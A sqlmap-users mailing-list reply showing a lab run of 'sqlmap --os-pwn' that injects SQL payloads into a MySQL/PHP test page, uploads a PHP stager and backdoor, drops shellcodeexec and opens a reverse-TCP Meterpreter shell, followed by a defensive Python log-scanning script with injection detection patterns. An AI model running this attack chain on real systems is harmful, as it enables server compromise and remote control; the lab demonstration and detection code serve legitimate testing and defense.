Re: [sqlmap-users] mysql os-pwn options on windows
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:14:02
$ sudo python sqlmap.py -u "http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
[sudo] password for stamparm:

[sqlmap banner] {1.0.4.21#dev}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:11:45

[09:11:45] [WARNING] you did not provide the local path where Metasploit Framework is installed
[09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[09:11:45] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[09:11:45] [INFO] resuming back-end DBMS 'mysql'
[09:11:45] [INFO] testing connection to the target URL
[09:11:45] [INFO] heuristics detected web page charset 'ascii'
[09:11:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2546=2546

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- epjZ
---
[09:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[09:11:45] [INFO] fingerprinting the back-end DBMS operating system
[09:11:45] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[09:11:46] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[09:11:47] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[09:12:02] [WARNING] unable to automatically parse any web server path
[09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[09:12:02] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
[09:12:02] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
[09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
>
what is the local address? [Enter for '192.168.146.1' (detected)]
which local port number do you want to use? [59643]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[09:12:04] [INFO] creation in progress ..... done
[09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe'
[09:12:09] [INFO] shellcodeexec successfully uploaded
[09:12:09] [INFO] running Metasploit Framework command line interface locally, please wait..

[Metasploit banner: METASPLOIT CYBER MISSILE COMMAND V4 - WAVE 4 - SCORE 31337 - HIGH FFFFFFFF]
http://metasploit.pro

       =[ metasploit v4.11.8-dev-a030179                  ]
+ -- --=[ 1527 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 59643
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:59643
[*] Starting the payload handler...
[09:12:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[09:12:23] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[*] Sending stage (957487 bytes) to 192.168.146.132
meterpreter >

On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> wrote:
> Hi all,
>
> I was just wondering, when I tried to do --os-pwn on sqlmap in my "DVWA
> windows machine"
>
> I got an error
>
> [WARNING] unable to upload the file through the web file stager to '/tmp'
>
> I wonder, is it only available for Linux OS?
>
> thanks
> Indra Z
>
> --
> --from the net with zero space--
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
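The session above leaves a characteristic trace in the web server's access log: injection payloads against the vulnerable parameter, followed by requests to freshly written tmpXXXXX.php files in the document root (the stager and backdoor). The script below is an added example, not code from the thread or from sqlmap; it assumes an Apache combined-format access log and runs over constructed sample lines that mirror the session.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format (assumed layout of the web server's access log).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Markers of the techniques seen in the session: time-based, error-based and UNION
# payloads, plus sqlmap's 0x71xxxxxx71 hex delimiters around extracted values.
INJECTION_RE = re.compile(
    r"SLEEP\(|UNION\s+ALL\s+SELECT|INFORMATION_SCHEMA|ELT\(|0x71[0-9a-f]{6}71",
    re.IGNORECASE,
)
# Stager/backdoor naming as in the session: tmp + five lowercase letters + .php in the webroot.
STAGER_RE = re.compile(r"^/tmp[a-z]{5}\.php$")

def analyse(lines):
    """Return {client_ip: {"injection": count, "stager": [paths]}} for suspicious clients."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = unquote_plus(m.group("path"))      # decode %20 etc. before matching
        base = path.split("?", 1)[0]
        entry = findings.setdefault(m.group("ip"), {"injection": 0, "stager": []})
        if INJECTION_RE.search(path):
            entry["injection"] += 1
        if STAGER_RE.match(base) and base not in entry["stager"]:
            entry["stager"].append(base)
    return {ip: e for ip, e in findings.items() if e["injection"] or e["stager"]}

def high_confidence(findings):
    """Clients that both injected SQL and reached a stager-like file: likely an os-pwn run."""
    return sorted(ip for ip, e in findings.items() if e["injection"] and e["stager"])

# Constructed sample log lines (not real traffic), modelled on the session above.
SAMPLE = [
    '192.168.146.1 - - [22/Apr/2016:09:11:45 +0200] "GET /test_environment/mysql/get_int.php?id=1%20AND%202546=2546 HTTP/1.1" 200 512',
    '192.168.146.1 - - [22/Apr/2016:09:11:45 +0200] "GET /test_environment/mysql/get_int.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))xlBU) HTTP/1.1" 200 512',
    '192.168.146.1 - - [22/Apr/2016:09:11:45 +0200] "GET /test_environment/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7178767071,0x4d45,0x7178767671)--%20epjZ HTTP/1.1" 200 640',
    '192.168.146.1 - - [22/Apr/2016:09:12:02 +0200] "POST /tmpuycdj.php HTTP/1.1" 200 77',
    '192.168.146.1 - - [22/Apr/2016:09:12:02 +0200] "GET /tmpbqtzu.php HTTP/1.1" 200 31',
    '10.0.0.7 - - [22/Apr/2016:09:12:30 +0200] "GET /test_environment/mysql/get_int.php?id=2 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(result, "high confidence:", high_confidence(result))
```

Pair this with a file-integrity check on the document root and C:/Windows/Temp, since the stager, backdoor and shellcodeexec binary are all written there by the database process rather than by the web server.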